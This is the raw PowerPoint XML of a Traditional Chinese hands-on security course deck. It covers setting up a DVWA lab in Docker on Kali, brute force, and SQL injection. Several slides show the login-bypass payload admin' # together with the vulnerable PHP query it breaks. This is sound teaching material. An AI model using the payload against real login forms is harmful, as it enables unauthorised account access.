        <p:spPr>
          <a:xfrm rot="8973420">
            <a:off x="4181215" y="2846511"/>
            <a:ext cx="537320" cy="438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733C693B-D6B7-4195-A577-B1705E67F4CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3673088" y="2386432"/>
            <a:ext cx="50321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發現沒有對輸入做任何檢查，直接置入資料庫中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21" name="矩形 20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4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3690330" y="2307644"/>
            <a:ext cx="212659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3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708ECD6F-C8B1-470B-95CD-BC05542ED90F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885521" y="2020694"/>
            <a:ext cx="339054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300" dirty="0"/>
              <a:t>超簡單的方法，直接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin' #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3300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ADAC3C3-C29C-4C02-BBC1-224F1224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93" y="2995360"/>
            <a:ext cx="2514600" cy="23645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群組 12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4" name="矩形 13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792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0" y="1335063"/>
            <a:ext cx="1628138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FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Brute Force</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" sz="24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xmlns="" id="{FB13A0F3-42D7-497F-B3E5-D2ED04A58FE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4089702" y="1476538"/>
            <a:ext cx="110630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原理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0B0E400-3829-40EA-98DD-5A83051EF907}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1663009" y="4582518"/>
            <a:ext cx="6494085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100" dirty="0"/>
              <a:t>找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user=admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>，符號</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’#’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>是代表後面不執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>註解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>的意思</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2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40989F2-68E7-43BA-990E-A529BDBBA653}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="961161" y="3089001"/>
            <a:ext cx="74760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* FROM `users` WHERE user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$user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 AND password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$pass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54AE7E0-050F-4AF6-8E44-9B597660ACFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3209313" y="2331492"/>
            <a:ext cx="27253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700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>$user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2700" dirty="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> #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A6EE0D6-B55E-4376-971B-EE91F16DE97F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="841617" y="3586398"/>
            <a:ext cx="77151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$query  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= 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"SELECT * FROM `users` WHERE user = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>admin' #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 AND password = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>$pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>';"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="15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65B8DF9-BB63-4F37-97B1-8C1DC9D1F4B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="841617" y="4087256"/>
            <a:ext cx="55755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WHERE user = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>admin' #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 AND password = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>$pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>';"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="21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1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167193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安裝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E22C244-3774-4541-8687-C3779F0A907F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1532018" y="2444842"/>
            <a:ext cx="56213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[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>設定 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Docker APT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>資料庫 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sz="1500" dirty="0"/>
              <a:t>echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>/apt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0" err="1"/>
              <a:t>sources.list.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0" err="1"/>
              <a:t>docker.list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CF28CEB-15D0-4FFA-A7CD-97A1F17EFE97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1532018" y="3772334"/>
            <a:ext cx="15575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00" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[2]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>更新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>APT:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>     apt-get update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A7B2117-9508-4E8A-A231-B07FF08C45C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1532019" y="449151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500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[3]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>安裝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t> Docker:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>移除之前安裝的版本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>apt-get remove docker docker-engine docker.io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9CEE83A-6A9C-4410-83A1-24E321456988}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5693182" y="3789323"/>
            <a:ext cx="22177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00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[4]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>安裝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t> Docker:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>     apt-get install docker-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0" err="1"/>
              <a:t>ce</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="15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5F69C5E-D3DD-48F4-B791-B83ADE205987}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5754729" y="4491516"/>
            <a:ext cx="2404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00" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[5]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>測試看看是否成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>docker run hello-world</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="15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F3956C1-6CB6-4562-A10B-C20901EF496E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2240977" y="1559427"/>
            <a:ext cx="290053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https://zh.wikipedia.org/zh-tw/Docker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2155681" y="521069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已經完成安裝請直接使用，可直接跳過本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>階段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Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>_2019_2_Docker_DVWA.ova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15" name="矩形 14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E00FEE2-8440-49C2-A053-FF983B290A65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="615581" y="1335063"/>
            <a:ext cx="263982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啟動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Service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883D249-2ECA-4A4E-BB19-2FA52A1F205D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2850638" y="2602507"/>
            <a:ext cx="3647152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手動啟動服務</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> start docker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2700" dirty="0"/>
              <a:t>系統開機時自動啟動：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> enable docker</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F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0" y="5989790"/>
            <a:ext cx="9144000" cy="461665"/>
            <a:chOff x="0" y="5647634"/>
            <a:chExt cx="12192000" cy="615553"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536700" y="5647634"/>
              <a:ext cx="10655300" cy="6155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</a:rPr>
                <a:t>新型態資安實務課程計畫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647634"/>
              <a:ext cx="1477328" cy="615553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教育部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4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1850</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>455</Paragraphs>
  <Slides>79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0" baseType="lpstr">
      <vt:lpstr>Office 佈景主題</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>模組學習目標</vt:lpstr>
      <vt:lpstr>模組學習地圖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I3301</cp:lastModifiedBy>
  <cp:revision>220</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-09-11T09:30:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-21T06:19:05Z</dcterms:modified>
</cp:coreProperties>
</file>